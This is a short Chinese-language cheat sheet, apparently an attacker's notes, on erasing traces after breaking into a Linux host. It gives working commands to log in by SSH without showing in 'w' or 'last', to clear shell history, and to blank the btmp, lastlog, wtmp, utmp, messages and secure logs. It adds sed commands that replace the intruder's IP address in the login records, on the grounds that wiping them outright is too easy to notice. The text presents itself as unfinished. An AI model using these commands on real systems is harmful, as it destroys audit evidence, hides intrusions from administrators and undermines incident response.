- linux痕迹清除
- ssh登录不被w last命令监测到
- 清除history记录
- 清除系统日志
ssh -T root@192.0.0.1 /bin/bash -i清除history记录
history -r清除系统日志
echo >/var/log/btmp # 清除登录失败日志 echo >/var/log/lastlog # 清除最后一次登录时间日志 echo >/var/log/wtmp # 清除用户登录日志 对应last echo >/var/log/utmp # 清除已经登录用户 cat /dev/null >/var/log/message # 清除错误日志 cat /dev/null >/var/log/secure # 清除安全日志
这样太容被发现了,所以考虑使用日志替换
sed -i 's/192.168.0.0/192.168.1.1/g' /var/log/lastlog sed -i 's/192.168.0.0/192.168.1.1/g' /var/log/wtmp sed -i 's/192.168.0.0/192.168.1.1/g' /var/log/btmp sed -i 's/192.168.0.0/192.168.1.1/g' /var/log/utmp # kali2021不存在
未完待续
